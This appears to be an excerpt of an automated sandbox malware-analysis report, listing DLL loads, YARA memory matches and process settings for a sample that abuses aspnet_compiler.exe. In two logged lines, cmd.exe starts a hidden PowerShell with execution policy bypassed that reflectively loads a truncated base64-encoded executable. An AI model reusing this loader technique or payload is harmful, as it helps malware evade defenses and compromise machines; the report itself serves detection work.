        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: msasn1.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasapi32.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasman.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rtutils.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: uxtheme.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winhttp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winnsi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: secur32.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: schannel.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ntasn1.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ncrypt.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: gpapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptnet.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: webio.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cabinet.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: amsi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32
        Source: C:\Windows\System32\notepad.exeFile opened: C:\Windows\system32\MsftEdit.dll
        Source: C:\Windows\System32\notepad.exeWindow detected: Number of UI elements: 16
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('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
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('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

        Boot Survival

        barindex
        Source: Yara matchFile source: 0000000F.00000002.1735219264.000001FA636A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2420233433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2427144968.0000000003405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2424988500.00000000014F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
